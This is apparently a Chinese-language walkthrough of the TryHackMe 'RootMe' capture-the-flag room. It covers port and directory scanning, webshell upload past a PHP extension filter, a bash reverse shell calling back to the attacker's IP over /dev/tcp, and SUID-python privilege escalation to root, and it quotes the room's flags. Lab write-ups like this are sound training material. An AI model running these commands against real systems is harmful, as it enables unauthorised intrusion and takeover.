題目網址 : https://tryhackme.com/room/rrootme
目標IP : 10.10.233.205
Scanning
- 起手式 nmap
nmap -A 10.10.233.205
- 22 : SSH
- 7.6p1 有枚舉的漏洞 CVE-2018-15473
- https://github.com/sriramoffcl/OpenSSH-7.6p1-Exploit-py-/blob/master/45233.py
- 80 : Apache
- Apache httpd 2.4.29
- 22 : SSH
- nmap 掃描的同一時間,先打開網頁看看

- 網頁起手式 dirsearch
python3 dirsearch.py -u http://10.10.233.205/ -e all- 看起來可能會有趣的路徑
/panel//uploads/
上傳 webshell
/panel/可以上傳檔案
- 用 Wappalyzer 可以確定他是 PHP
- 上傳個 b374k.php

- 會噴錯,Google翻譯說
PHP是不允許的!(葡萄牙文)
- 使用 php 副檔名解析漏洞測試
- Apache 1.x 2.x 文件解析特性
- BJ4
- 測試檔名
b374k.php.aaa
- Google 翻譯 :
文件上傳成功!
- Google 翻譯 :
- Apache 1.x 2.x 文件解析特性
使用 Webshell
- 點下面的
Veja!會跳轉到http://10.10.233.205/uploads/b374k.php.aaa
- 使用預設密碼就能進入 shell
戳入 Reverse Shell
- Webshell 滿好用的,但是Reverse shell用起來更爽
- 確認攻擊機 ip 為 10.14.7.198
- 終端機輸入
nc -vlk 7877
- 終端機輸入
- webshell 的 Terminal 輸入
bash -c 'bash -i >& /dev/tcp/10.14.7.198/7877 0>&1'
- 即可順利連上 Reverse shell
- 輸入指令讓他變得更 interactive 一點
python -c 'import pty; pty.spawn("/bin/bash")'
- 確認攻擊機 ip 為 10.14.7.198
在電腦裡面逛大街
- user.txt

THM{y0u_g0t_a_sh3ll
設法提權
- 使用內建的上傳功能上傳 LinEnum.sh
- 開權限
chmod +x LinEnum.sh - 執行,並存到檔案
./LinEnum.sh | tee meow.txt - 基本上優先注意紅色、橘色的東西
- 開權限
- 找到有趣ㄉ東西!!
[+] Possibly interesting SUID files: -rwsr-sr-x 1 root root 3665768 Aug 4 2020 /usr/bin/python- 也就是說
/usr/bin/python可以用 SUID 執行 - 到 GTFOBins 找 Python 有 SUID 的提權方法
python -c 'import os; os.execl("/bin/sh", "sh", "-p")'
- 也就是說
提權成功!!

- Flag :
THM{pr1v1l3g3_3sc4l4t10n}


